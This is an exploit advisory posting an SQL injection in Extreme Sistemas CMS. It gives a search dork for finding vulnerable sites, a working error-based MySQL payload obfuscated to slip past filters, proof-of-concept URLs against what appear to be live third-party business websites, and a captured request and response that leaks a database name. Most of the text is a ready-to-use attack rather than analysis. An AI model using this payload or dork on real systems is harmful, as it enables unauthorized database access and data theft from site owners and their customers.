Extreme Sistemas CMS SQL Injection

`[+] Sql Injection on Extreme Sistemas CMS   
  
[+] Date: 08/05/2019  
  
[+] Risk: High  
  
[+] CWE Number : CWE-89  
  
[+] Author: Felipe Andrian Peixoto  
  
[+] Vendor Homepage: http://www.extremesistemas.com.br/criacao-de-sites  
  
[+] Contact: [email protected]  
  
[+] Tested on: Windows 7 and Gnu/Linux  
  
[+] Dork: inurl:"pagina.aspx?cat=" // use your brain ;)  
  
[+] Exploit :   
  
http://host/patch/pagina.aspx?cat= [SQL Injection]  
  
[+] PoC :   
  
http://www.advlink.com.br/pagina.aspx?cat=pagina.aspx?cat=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-  
http://www.automecanicamiguel.com.br/pagina.aspx?cat=pagina.aspx?cat=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-  
  
[+] Example:  
  
GET /pagina.aspx?cat=pagina.aspx?cat=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- HTTP/1.1  
Host: www.advlink.com.br  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Cookie: _pk_id.21751.d41e=b782be8e411c8dd2.1557328531.1.1557329566.1557328531.; _pk_ref.21751.d41e=%5B%22%22%2C%22%22%2C1557328531%2C%22https%3A%2F%2Fwww.google.com%2F%22%5D; _pk_ses.21751.d41e=*; ASP.NET_SessionId=sem1hd45eqorbv55oayy3y45  
DNT: 1  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
  
ERROR [HY000] [MySQL][ODBC 5.1 Driver][mysqld-5.6.35-81.0-log]XPATH syntax error: 's3x0u:advlink_novo:s3x0u'  
  
.........  
  
[+] EOF  
`